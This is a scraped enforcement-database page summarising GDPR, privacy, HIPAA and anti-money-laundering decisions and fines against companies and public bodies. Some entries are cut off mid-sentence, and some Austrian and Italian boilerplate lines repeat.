Global Enforcement Explorer

This Decision arises from an own-volition inquiry into the University of Limerick (‘UL’) following a series of personal data breaches that occurred between November 2018 and January 2020. The temporal scope of the Inquiry is from May 2018 to January 2020.

This own-volition inquiry, which commended in July 2021, follows a prior DPC investigation into certain aspects of the DSP’s processing of personal data in connection with the issuance of PSCs. That investigation resulted in legal proceedings, in which the DSP appealed an Enforcement Notice issued by the DPC, which were subsequently withdrawn. A joint agreement between the DPC and the DSP as well as the final investigation report from that inquirywere published in December 2021. The final invest

The breach arose from MPIL’s use of user tokens in connection with certain features on the Facebook platform. User tokens are coded identifiers that can be used to verify the user of a platform or utility, and to control access to particular platform features and personal data of the user and their contacts. In 2017 MPIL introduced a new video uploading feature. When used in conjunction with Facebook’s ‘View As’ feature (which allows a user’s page to be viewed as another user would see it) and t

For more information, you can download the full decision at this link:Inquiry into Sligo County Council November 2024 - (PDF, 7.6MB)

This decision arises from an own-volition inquiry that the DPC commenced in July 2019. The inquiry related a personal data breach notified by Maynooth University in November 2018.

The DPC has completed a complaint based inquiry into MIG’s processing of personal data in relation to a series of news reports in the print and online editions of the Irish Independent, Herald and Sunday Independent newspapers. The purpose of the inquiry was to examine if any obligations on the controller arising under Articles 5(1)(a), 5(1)(c), 5(2), 6 and 9 GDPR had been engaged and, if engaged, whether MIG infringed those obligations in publishing the personal data relating to the Complainant

In light of the infringements of Articles 13(1)(c) and 13(1)(d) of the GDPR, the DPC issued a reprimand to Apple pursuant to Article 58(2)(b) of the GDPR, and the DPC ordered Apple, pursuant to Article 58(2)(d) of the GDPR to review and revise its document entitled “Apple ID Deletion Terms and Conditions” to address the transparency deficiencies identified in the DPC’s decision. In addition, with regard to Apple’s project, the DPC ordered Apple to provide details of completion of this project to

The DPC finds that Microsoft infringed Article 12(4) of the GDPR in respect of the March erasure request when it failed to inform the complainant of the possibility of seeking a judicial remedy when it responded to them outlining the reasons for not taking action, in part, on the complainant’s erasure request.

The DPC found that Airbnb did not validly rely on Article 6(1)(f) of the GDPR as the legal basis for processing the Complainant’s photographic ID and supplemental photographs; that Airbnb’s requirement that the Complainant verify his identity by submitting a complete and unredacted copy of his photographic ID constituted an infringement of the principle of data minimisation, pursuant to Article 5(1)(c); that by retaining, after the identity verification process was successfully completed and unt

The Data Protection Commission (DPC) adopted its final decision regarding its inquiry into TikTok Technology Limited (TTL) on 1 September 2023.

Resolución AEPD PS/00598/2025 contra Respondent (PS/00598/2025)

Resolución AEPD PS/00643/2025 contra Respondent (PS/00643/2025)

Resolución AEPD PS/00354/2024 contra Respondent (PS/00354/2024)

Resolución AEPD PS/00278/2025 contra Respondent (PS/00278/2025)

Resolución AEPD PS/00352/2024 contra Respondent (PS/00352/2024)

Resolución AEPD PS/00613/2025 contra Respondent (PS/00613/2025)

Resolución AEPD PS/00259/2025 contra Respondent (PS/00259/2025)

Tra 1 secondo avverrà un redirect automatico alla nuova pagina.Se non vuoi aspettareclicca qui.

[Anmerkung Bearbeiter/in: Namen und Firmen, Rechtsformen und Produktbezeichnungen, Adressen (inkl. URLs, IP- und E-Mail-Adressen), Aktenzahlen (und dergleichen), statistische Angaben etc., sowie deren Initialen und Abkürzungen können aus Pseudonymisierungsgründen abgekürzt und/oder verändert sein. Offenkundige Rechtschreib-, Grammatik- und Satzzeichenfehler wurden korrigiert.

[Anmerkung Bearbeiter/in: Namen und Firmen, Rechtsformen und Produktbezeichnungen, Adressen (inkl. URLs, IP- und E-Mail-Adressen), Aktenzahlen (und dergleichen), statistische Angaben etc., sowie deren Initialen und Abkürzungen können aus Pseudonymisierungsgründen abgekürzt und/oder verändert sein. Offenkundige Rechtschreib-, Grammatik- und Satzzeichenfehler wurden korrigiert.

DSB Bescheid gegen stand ihres Unternehmens

DSB Bescheid gegen Unknown

[Anmerkung: Namen, Initialen, Adressen (inkl. URLs), Datumsangaben, wörtliche Zitate, Textfragmente, Bilder, etc. können aus Pseudonymisierungsgründen abgekürzt und/oder verändert sein. Offenkundige Rechtschreib-, Satzzeichen- und Formatierungsfehler wurden korrigiert.]

[Anmerkung: Namen, Initialen, Adressen (inkl. URLs), Datumsangaben, wörtliche Zitate, Textfragmente, Bilder, etc. können aus Pseudonymisierungsgründen abgekürzt und/oder verändert sein. Offenkundige Rechtschreib-, Satzzeichen- und Formatierungsfehler wurden korrigiert.]

DSB Bescheid gegen den Tiroler Landtag (Erstbeschwerdegegner), die Pr

DSB Bescheid gegen Unknown

[Anmerkung: Namen, Initialen, Adressen (inkl. URLs), Datumsangaben, wörtliche Zitate, Textfragmente, Bilder, etc. können aus Pseudonymisierungsgründen abgekürzt und/oder verändert sein. Offenkundige Rechtschreib-, Satzzeichen- und Formatierungsfehler wurden korrigiert.]

[Anmerkung: Namen, Initialen, Adressen (inkl. URLs), Datumsangaben, wörtliche Zitate, Textfragmente, Bilder, etc. können aus Pseudonymisierungsgründen abgekürzt und/oder verändert sein. Offenkundige Rechtschreib-, Satzzeichen- und Formatierungsfehler wurden korrigiert.]

NELLA riunione odierna, alla quale hanno preso parte il prof. Pasquale Stanzione, presidente, la prof.ssa Ginevra Cerrina Feroni, vicepresidente, il dott. Agostino Ghiglia, componente, e il dott. Luigi Montuori, segretario generale;

NELLA riunione odierna, alla quale hanno preso parte il prof. Pasquale Stanzione, presidente, la prof.ssa Ginevra Cerrina Feroni, vicepresidente, il dott. Agostino Ghiglia, componente, e il dott. Luigi Montuori, segretario generale;

NELLA riunione odierna, alla quale hanno preso parte il prof. Pasquale Stanzione, presidente, la prof.ssa Ginevra Cerrina Feroni, vicepresidente, il dott. Agostino Ghiglia, componente e il dott. Luigi Montuori, segretario generale;

NELLA riunione odierna, alla quale hanno preso parte il prof. Pasquale Stanzione, presidente, la prof.ssa Ginevra Cerrina Feroni, vicepresidente, il dott. Agostino Ghiglia, componente e il dott. Luigi Montuori, segretario generale;

NELLA riunione odierna, alla quale hanno preso parte il prof. Pasquale Stanzione, presidente, la prof.ssa Ginevra Cerrina Feroni, vicepresidente e il dott. Agostino Ghiglia, componenti, e il dott. Luigi Montuori, segretario generale;

NELLA riunione odierna, alla quale hanno preso parte il prof. Pasquale Stanzione, presidente, la prof.ssa Ginevra Cerrina Feroni, vicepresidente, il dott. Agostino Ghiglia, componente, e il dott. Luigi Montuori, segretario generale;

NELLA riunione odierna, alla quale hanno preso parte il prof. Pasquale Stanzione, presidente, la prof.ssa Ginevra Cerrina Feroni, vicepresidente, il dott. Agostino Ghiglia, componente e il dott. Luigi Montuori, segretario generale;

NELLA riunione odierna, alla quale hanno preso parte il prof. Pasquale Stanzione, presidente, la prof.ssa Ginevra Cerrina Feroni, vicepresidente, il dott. Agostino Ghiglia, componente e il dott. Luigi Montuori, segretario generale;

NELLA riunione odierna, alla quale hanno preso parte il prof. Pasquale Stanzione, presidente, la prof.ssa Ginevra Cerrina Feroni, vicepresidente, e il dott. Agostino Ghiglia, componente, e il dott. Luigi Montuori, segretario generale;

Clearview AI built a facial recognition database of over 30 billion photographs scraped from the internet — including images of Dutch residents — without any lawful basis, consent, or transparency, violating GDPR Arts. 5, 6, 9, and 14. The AP also issued a personal liability warning to Clearview's directors, noting the company had ignored prior enforcement actions by EU counterparts in France, Italy, Greece, and the UK. Clearview was additionally ordered to cease all processing of Dutch residents' data and to delete existing records.

Uber transferred personal data of European drivers — including location data, photos, payment details, and taxi licence information — to the US without adequate GDPR Chapter V transfer safeguards after the Privacy Shield invalidation. The Dutch AP, acting as lead supervisory authority following complaints filed by the French drivers' rights association LLLM, found that Uber's Standard Contractual Clauses were not correctly implemented in practice and that no supplementary measures addressed US government surveillance risks. This remains the largest ever GDPR fine for unlawful international data transfers.

Advanced Computer Software Group, supplier of NHS 111 and other critical healthcare IT services, was fined for an August 2022 ransomware attack that disrupted NHS services and compromised personal data of 82,946 patients. The ICO found Advanced had failed to implement multi-factor authentication across its systems, had inadequate vulnerability scanning, and had not conducted a DPIA for the health systems it managed — forcing NHS 111 to revert to paper records and disrupting ambulance dispatch across England. The fine was reduced from an initial notice of £6.09 million following representations.

Cerebral, a mental health telehealth company, was fined $7 million for sharing sensitive mental health information of approximately 3.2 million users — including conditions such as depression, anxiety, ADHD, and suicidality disclosed in intake questionnaires — with Meta, Google, TikTok, and other advertising platforms through tracking pixels and social media login features, violating its explicit privacy promises. The FTC also found Cerebral's subscription cancellation process was designed to make it deliberately difficult for patients to discontinue care, constituting an unfair practice. Cerebral was prohibited from using or disclosing health data for advertising.

Advocate Aurora Health agreed to pay $12.9 million to HHS OCR — the largest HIPAA settlement of 2024 — for unauthorised disclosure of the protected health information of approximately 3 million patients through tracking pixels (Meta Pixel and Google Analytics) embedded on its patient-facing websites and patient portal. The tracking technologies transmitted patient identities, appointment details, IP addresses, and proxy health information to Meta and Google without patient authorisation, constituting impermissible disclosures of PHI to advertising platforms that were not business associates under HIPAA.

The DPC fined LinkedIn €310 million for unlawfully processing the personal data of LinkedIn members for behavioural analysis and targeted advertising. The investigation found LinkedIn relied on consent, legitimate interests, and contract performance as legal bases without meeting the conditions of any of these.

The London Borough of Hackney was fined for a October 2020 ransomware attack that compromised personal data of a large number of council residents and staff, including housing benefit records, social care information, and sensitive data such as racial and ethnic origin. The ICO found Hackney had failed to patch known software vulnerabilities, had inadequate security monitoring, and had insufficient network segmentation — all of which contributed to the successful attack. The council took over two years to fully restore its systems, significantly disrupting public services.

The DPC fined TikTok €345 million for failing to protect children's privacy. Findings included: accounts of users aged 13-17 were set to public by default, the Family Pairing feature allowed adults to link to children's accounts without verifying their age, and the 'public' setting defaulted to allowing other users to include children's videos in duet/stitch features.

Netflix failed to adequately inform subscribers about how their personal data was processed between 2018 and 2020, violating GDPR Arts. 13 and 14 transparency obligations. Netflix's privacy statements did not clearly explain which data was collected, for what purpose, how long it was retained, or with which third parties it was shared. The AP led the investigation as Netflix's EU headquarters are in Amsterdam, with the inquiry initiated following coordinated NOYB complaints filed across multiple EU jurisdictions.

The Garante issued a €79 million injunction against Enel Energia for unlawful telemarketing practices. The investigation found systematic use of call centres that contacted individuals listed on the national opt-out register (Registro Pubblico delle Opposizioni) and without valid consent.

Amazon was fined $25 million for COPPA violations related to Alexa, specifically for retaining children's voice recordings, transcripts, and geolocation data indefinitely in violation of its own privacy promises and COPPA's data minimisation requirements. The FTC found Amazon retained children's voice data for years even after parents requested deletion, gave employees broad access to children's voice recordings, and used children's geolocation data for product improvement without parental consent. Internal Amazon managers had raised concerns about the retention practices that were overruled by business considerations.

Ring, Amazon's home security camera subsidiary, agreed to pay $5.8 million after the FTC found it allowed employees and contractors unrestricted access to customers' private video footage — including intimate indoor cameras — and failed to implement security controls that enabled credential-stuffing attacks against thousands of customer accounts. The FTC characterised Ring's internal culture as 'anything goes' with respect to employee access to sensitive footage, including a Ukraine-based contractor allowed to view thousands of recordings without any purpose limitation or security review.

The DPC issued a €1.2 billion fine against Meta Ireland — the largest GDPR fine to date — for transferring personal data of EU/EEA Facebook users to the United States without adequate safeguards following the invalidation of Privacy Shield by the Court of Justice in the Schrems II ruling.

Following a temporary ban on ChatGPT in Italy in March 2023, the Garante reached agreement with OpenAI on remediation measures. OpenAI later received a €20 million fine for multiple GDPR violations including processing data without a valid legal basis, lack of age verification mechanisms for minors, and insufficient transparency.

TikTok was fined for processing the personal data of an estimated 1.4 million children under 13 in the UK without appropriate parental consent between May 2018 and July 2020, and for allowing under-13s to create accounts on the platform despite claiming to prevent this. The ICO found TikTok also failed to use children's data in accordance with its own privacy policy and failed to ensure data accuracy. The investigation drew on the ICO's Age Appropriate Design Code (Children's Code), which came into force in September 2021 and sets out standards platforms must meet when processing children's data.

BetterHelp, an online mental health counselling platform, was fined $7.8 million for sharing customers' sensitive mental health information — including intake questionnaire responses about depression, anxiety, and therapy history — with Facebook, Snapchat, Criteo, and Pinterest for targeted advertising, directly contradicting explicit privacy promises that mental health data would never be used for advertising. The FTC found BetterHelp uploaded therapy users' email addresses and Facebook IDs to create Custom Audiences and Lookalike Audiences for new customer acquisition. The $7.8M settlement was used to provide refunds to affected consumers.

GoodRx was subject to the FTC's first-ever enforcement action under the Health Breach Notification Rule for sharing customers' sensitive personal health information — including prescription drug purchases and associated medical conditions — with Facebook, Google, Criteo, and other advertising platforms for targeted advertising, without users' knowledge or consent. The FTC found GoodRx failed to honour its privacy policy commitment not to share health information with advertisers and violated its promise to limit data use to healthcare purposes. GoodRx also failed to notify affected users of the disclosures as required.

CNIL fined TikTok €5 million for failing to provide a simple mechanism for refusing non-essential cookies on its platform for French users, and for failing to explain the purpose of cookies clearly.

Epic Games was fined $275 million for COPPA violations in Fortnite — including collecting personal information from children under 13 without verifiable parental consent, enabling live voice communications between children and adults by default, and creating accounts for children without parental authorisation. A simultaneous $245 million dark patterns settlement (total $520M) addressed charges that Epic used manipulative button configurations and accidental charge mechanisms to cause players to make unintended in-game purchases. The combined $520 million settlement was the largest FTC enforcement action in gaming history.

The AEPD fined CaixaBank €6 million for processing the biometric data of employees using a fingerprint access control system without adequate legal basis. The fine was later reduced to €3 million following voluntary payment and acknowledgement of responsibility.

Interserve Group, a major UK government contractor, was fined for a 2020 phishing attack that compromised personal and special category data of up to 113,000 current and former employees, including health, financial, and immigration status information. The ICO found Interserve had failed to implement adequate anti-phishing controls, failed to follow its own security processes for flagging suspicious emails, had outdated and unpatched software across its systems, and provided insufficient staff security training. The company was also required to implement a formal remediation programme.

The GBA Litigation Chamber issued an enforcement decision against Meta Platforms Ireland for GDPR violations in Belgium relating to Meta's use of 'contractual necessity' as a legal basis for behavioural advertising, finding this basis incompatible with GDPR for processing personal data for ad targeting beyond what is strictly necessary to provide the contracted social media service. The Belgian action was part of a coordinated EU-wide enforcement process that ultimately resulted in the Irish DPC issuing fines of €210M (Instagram) and €180M (Facebook) in January 2023 following an EDPB binding decision. Belgium acted as a concerned supervisory authority triggering the dispute resolution mechanism.

CNIL fined Clearview AI €20 million for unlawfully collecting and processing biometric data of French residents without a legal basis, and for failing to respond to data subject access requests within the required timeframe.

Easylife Group unlawfully profiled over 145,000 customers using purchase history to infer health conditions and then sold them related health products without their knowledge or consent — for example, inferring diabetes from purchases of compression socks and targeting those customers with diabetes medication products. The ICO found this constituted processing of inferred special category health data without explicit consent, as required by UK GDPR Art. 9. Easylife was simultaneously fined £130,000 by the ICO under PECR for related unlawful direct marketing calls.

The AEPD fined Yoigo/Xfera Móviles €900,000 for making unsolicited commercial communications to customers who had not given consent, violating LOPDGDD provisions on the use of contact data for direct marketing purposes.

The DPC fined Instagram €405 million for mishandling the personal data of children and teenagers. The investigation found that children's accounts were set to public by default, and that contact details of minors were publicly accessible.

The Garante fined Facebook/Meta €60 million for unlawfully sharing Italian users' data with third parties through the 'Like' button integration on external websites without adequate notice or consent, and for cross-referencing data between Facebook and off-Facebook activity.

Twitter was fined $150 million for violating a 2011 FTC consent order by using phone numbers and email addresses that users had provided for two-factor authentication security purposes to deliver targeted advertising through its Tailored Audiences programme between 2014 and 2019. The FTC found Twitter had explicitly told users the data was collected solely for account security while simultaneously monetising it for advertising targeting. The settlement also required a comprehensive privacy and information security programme with independent biennial audits.

The ICO fined Clearview AI for unlawfully scraping and processing facial images of UK residents to build a database of over 20 billion images used to offer facial recognition services to law enforcement and commercial clients, without lawful basis, transparency, or any mechanism for UK residents to exercise data subject rights. The ICO coordinated its investigation with Australian and other privacy regulators as part of a joint international enforcement effort. The fine was reduced from an initial enforcement notice of £17.1 million following representations.

CNIL fined health website Doctissimo €380,000 for multiple GDPR violations: collecting health data without valid consent, keeping data longer than necessary, and using outdated encryption protocols on its web server.

The DSB fined an Austrian bank €1.2 million for retaining former customer data beyond the required retention period, and for failing to implement adequate access controls that led to an internal data breach where employee data was accessible to unauthorised staff.

The Garante ordered Clearview AI to delete the biometric data of Italian residents and imposed a €20 million fine for unlawfully building a facial recognition database from web-scraped images, without legal basis, without transparency, and without respecting data subject rights.

The Belgian DPA (GBA) found that IAB Europe's Transparency and Consent Framework (TCF) — the industry consent mechanism used by virtually every publisher and ad tech company across the EU — violated GDPR in multiple fundamental ways, including that the encoded TC String constitutes personal data, that IAB Europe is a data controller for its creation, and that 'legitimate interest' cannot serve as legal basis for behavioural advertising profiling at scale. The decision had immediate EU-wide consequences as thousands of websites relied on TCF as their primary GDPR consent mechanism. IAB Europe was given six months to bring the TCF into compliance.

The DSB issued a landmark ruling that an Austrian website operator violated GDPR by using Google Analytics, which transferred European users' data to the United States without adequate safeguards following the Schrems II ruling. This was one of the first EU regulatory decisions against Google Analytics use post-Schrems II.

CNIL fined Google €150 million for making it more difficult for users to refuse cookies than to accept them. The cookie consent mechanism on google.fr and youtube.com did not provide a simple means to refuse all cookies, violating French data protection law.

CNIL fined Meta/Facebook €60 million for the same defective cookie consent mechanism. Users on facebook.com could not refuse cookies as easily as they could accept them, breaching Article 82 of the French Data Protection Act.

The DSB confirmed an earlier fine of €18 million against Österreichische Post for processing the personal data of approximately 3 million Austrians to infer political party affinity and sell this data to third parties for advertising purposes, without a valid legal basis. The Austrian Supreme Court (OGH) subsequently reduced the fine to €9.5 million on appeal.

The AEPD fined Endesa €3 million for processing customers' personal data without a valid legal basis for direct marketing, and for failing to adequately handle data subjects' objections to marketing communications.

The DPC fined WhatsApp €225 million for failing to comply with GDPR transparency requirements. WhatsApp did not adequately inform users and non-users about how their data is shared with other Meta companies.

The DSB fined CRIF GmbH €2 million for operating a credit scoring and personal data brokerage business without adequate transparency, without proper legal basis for special category data inferences, and for failing to facilitate access and erasure requests from data subjects.

The AEPD fined BBVA €5 million for tracking customers' location data and processing personal data for profiling purposes without adequate transparency and without providing clear consent mechanisms in the BBVA mobile banking application.

The DSB imposed an €800 fine on the Municipality of Hallein for operating a video surveillance system in a public area without proper signage informing individuals about the processing of their image data, violating GDPR transparency requirements under Article 13.

ABN AMRO Bank N.V. reached a €480 million settlement with the Dutch Public Prosecution Service for sustained AML failures including inadequate customer due diligence, insufficient transaction monitoring, and failure to file suspicious transaction reports in a timely manner. Prosecutors established that ABN AMRO had been aware of the compliance deficiencies for years and had failed to implement adequate remediation, with shortcomings identified across the bank's operations between 2014 and 2020. The bank admitted to serious structural failures in its AML programme.

The AEPD fined Vodafone España €8.15 million for multiple GDPR violations including unlawful processing of personal data for commercial communications without consent, obstructing customer requests to exercise data protection rights, and inadequate data security measures.

The Baden-Württemberg State DPA (LfDI BW) fined statutory health insurer AOK Baden-Württemberg €1.24 million for unlawfully passing the personal data of 500,000 policyholders — including names, addresses, and insurance numbers — to partner lottery operators for direct marketing without member consent. Members were not informed their data would be shared with third-party lottery companies, and the LfDI found no adequate legal basis for the transfer under GDPR Art. 6. AOK had organised branded prize draws with lottery partners and provided member data to enable the lottery operators' own follow-on marketing campaigns.

Marriott International was fined for a data breach originating from a compromise of the Starwood Hotels reservation system that dated to 2014, remained undetected until 2018, and ultimately exposed approximately 339 million guest records worldwide including around 7 million UK residents. The ICO found Marriott failed to conduct adequate due diligence when it acquired Starwood in 2016 and failed to implement adequate security measures on the inherited systems post-acquisition. The fine was reduced from an initial notice of £99.2 million following co-operation with the investigation.

British Airways suffered a 2018 cyberattack in which attackers injected malicious JavaScript onto the BA website that harvested personal and payment card data of approximately 429,612 customers by redirecting users to a fraudulent site during the booking process. The ICO found BA's security measures were inadequate and that the attack could have been prevented with more robust controls including script integrity monitoring and multi-factor authentication. The fine was reduced from an initial notice of £183.39 million due in part to the economic impact of COVID-19 on the aviation sector.

The Hamburg DPA (HmbBfDI) imposed Germany's largest-ever GDPR fine against H&M for systematically recording hundreds of employees' private life details at its Nuremberg service centre — including family matters, religious beliefs, health conditions, and personal life notes gathered during 'welcome back talks' and routine conversations — storing them in a networked file server accessible to up to 50 managers and using them to make HR decisions. The data collection had continued for years and came to light only when a configuration error temporarily made the records accessible to all company staff in October 2019. H&M acknowledged the violations and introduced remedial measures.

Transavia Airlines suffered a 2019 data breach in which hackers compromised employee login credentials and accessed the personal data — names, dates of birth, and flight reservation details — of approximately 25,000 passengers and crew members. The AP found Transavia had failed to implement multi-factor authentication on employee systems with access to passenger records, a standalone violation of GDPR Art. 32 independent of the breach itself. The absence of this basic control was found to have directly enabled the compromise.

The Lower Saxony DPA (LfD Niedersachsen) fined notebooksbilliger.de AG €10.4 million for operating a pervasive undisclosed video surveillance system that filmed employees at six locations — including workplaces, rest areas, and social rooms — continuously for over two years without adequate legal basis, without informing employees, and far beyond any demonstrable security purpose. The 60 cameras operated without defined retention periods and the footage was never systematically deleted. The LfD found the surveillance violated GDPR Arts. 5, 6, and 13 as well as the data minimisation principle.

Doorstep Dispensaree, a pharmacy delivering medication to care homes, was fined after ICO inspectors discovered approximately 500,000 documents — including patient names, addresses, dates of birth, NHS numbers, medical conditions, and prescription details — stored in unlocked caged trolleys in an external car park, exposed to the elements and accessible to anyone. The documents, some dating to 2016, had no document retention schedule or secure destruction procedures. The ICO found the pharmacy had failed to implement any of the basic physical security measures required for health records.

Premera Blue Cross agreed to pay $6.85 million to HHS OCR following a 2014 cyberattack that exposed the protected health information of 10.4 million individuals, including clinical and financial information. HHS OCR found systemic HIPAA non-compliance including failure to conduct an accurate and thorough risk analysis and failure to implement information system activity review — critically, a third-party security audit had identified the vulnerabilities later exploited by attackers several months before the breach occurred, but remediation was not completed in time.

The National Bank of Belgium (NBB) imposed supervisory measures and administrative fines against ING Belgium for systemic deficiencies in its anti-money laundering compliance programme identified in the aftermath of parent company ING Group's €775 million Dutch AML settlement in September 2018. Investigators found ING Belgium had inadequate customer due diligence procedures, insufficient transaction monitoring coverage, and delayed suspicious transaction reporting to the Belgian Financial Intelligence Unit (CTIF-CFI). The NBB required a comprehensive AML remediation programme overseen by an independent compliance monitor.

Haga Ziekenhuis (Hague Academic Hospital) failed to implement adequate access controls and audit logging for electronic patient records, violating GDPR Art. 32 and Dutch medical confidentiality obligations. The AP's investigation, triggered by media reports that dozens of hospital staff had unlawfully accessed the records of a high-profile patient without clinical justification, found systemic failures in role-based access controls and alert mechanisms. The hospital was ordered to implement corrective measures within four months under threat of additional periodic penalties.

Virgin Media Limited left a marketing database containing personal data of approximately 900,000 customers incorrectly configured and publicly accessible online for approximately ten months between April 2019 and February 2020. The ICO found Virgin Media failed to conduct a Data Protection Impact Assessment for the database, failed to apply basic access controls, and failed to maintain procedures for regular security testing — the misconfiguration was discovered not by Virgin Media's own monitoring but by a security researcher. The exposed data included names, home addresses, email addresses, and phone numbers.

Booking.com failed to report a personal data breach to the AP within the mandatory 72-hour window under GDPR Art. 33, delaying notification by more than three weeks. In late 2018, fraudsters using phishing attacks against hotel partners compromised employee accounts and accessed the personal and payment card data of approximately 40,000 customers. The AP found Booking.com's internal escalation procedures failed to trigger timely regulatory reporting and that customers were also not promptly informed.

The Garante imposed a €27.8 million fine on TIM for numerous GDPR violations: making unsolicited marketing calls (including to individuals on do-not-call lists), activating services without consent, collecting data through a dark-pattern-based app, and inadequate data retention policies.

DSG Retail Limited (Currys PC World) was fined the maximum penalty under the Data Protection Act 1998 following a cyberattack between July 2017 and April 2018 in which attackers installed malware on point-of-sale terminals across hundreds of UK stores, compromising the payment card data of an estimated 14 million customers. The ICO found DSG had inadequate patch management, no vulnerability scanning programme, and failed to detect the nine-month compromise through absence of basic security monitoring. The violations predated GDPR but the fine was the maximum available under the applicable DPA 1998 regime.

The Federal Data Protection Commissioner (BfDI) fined 1&1 Telecom GmbH €9.55 million for maintaining a grossly inadequate customer service authentication procedure that allowed any caller to access another person's complete account information — including contact details, contract terms, and phone numbers — simply by providing the target's name and date of birth, information obtainable from publicly available sources. The BfDI found this two-element authentication was categorically insufficient given the sensitivity of the account data disclosed and constituted a systemic GDPR Art. 32 failure. The fine was reduced on appeal.

The Berlin Commissioner for Data Protection (BlnBDI) fined real estate company Deutsche Wohnen SE €14.5 million for using an archiving system for tenant personal data — including proof of income, employment history, tax documents, health insurance details, and bank account information — that had no provision for deleting documents no longer required, violating GDPR Arts. 5(1)(e) and 25. The case generated significant EU legal debate: the Berlin Court of Appeal partially annulled the fine in 2021 on grounds that individual organisational fault must be proven, and the Bundesgerichtshof subsequently referred questions on corporate GDPR liability to the ECJ.

The FTC and New York Attorney General imposed a combined $170 million penalty ($136M FTC + $34M NY AG) against Google and YouTube for violating COPPA by collecting persistent identifiers — used for targeted advertising — from viewers of child-directed content on YouTube without verifiable parental consent. Google had classified YouTube channels as child-directed yet systematically collected data from those channels' audiences and used it to serve behavioural advertising. This was the largest COPPA penalty in US history at the time.

The FTC imposed a record $5 billion civil penalty against Facebook for multiple violations of a 2012 consent order requiring affirmative user consent before sharing data with third parties, most visibly through the Cambridge Analytica scandal in which data from approximately 87 million users was harvested without consent. The FTC found Facebook made repeated misrepresentations about user privacy and the effectiveness of its privacy controls. The order imposed far-reaching structural requirements including creation of an independent privacy committee of Facebook's board and personal quarterly privacy certifications from CEO Mark Zuckerberg.

The Baden-Württemberg State DPA (LfDI BW) imposed Germany's first-ever GDPR fine — a deliberately modest €20,000 — against the German social networking platform Knuddels for storing approximately 330,000 user passwords in plaintext, leading to a July 2018 breach exposing nearly 2 million user records including emails and cleartext passwords. The LfDI explicitly set the fine low to reward Knuddels' exemplary breach response: the company proactively notified the authority, publicly disclosed the breach in detail, implemented proper password hashing immediately, and co-operated fully with the investigation.

Anthem Inc. agreed to pay $16 million — the largest HIPAA settlement in history at the time — following a 2015 cyberattack that compromised the electronic protected health information of approximately 78.8 million individuals, the largest healthcare data breach in US history. HHS OCR found Anthem failed to conduct an enterprise-wide HIPAA security risk analysis, failed to implement appropriate information system activity review, and had insufficient technical controls to identify and respond to suspicious network activity prior to the breach. The settlement also required a comprehensive corrective action plan monitored for two years.

ING Bank N.V. entered into a €775 million deferred prosecution agreement (schikking) with the Dutch Public Prosecution Service for systemic AML failures spanning multiple years, including critically deficient customer due diligence processes that enabled large-scale money laundering linked to criminal organisations, corruption, and sanctions evasion. The settlement comprised €298 million in disgorgement and €477 million in fines, making it the largest corporate crime settlement in Dutch history at the time. Senior management were separately investigated for individual criminal liability.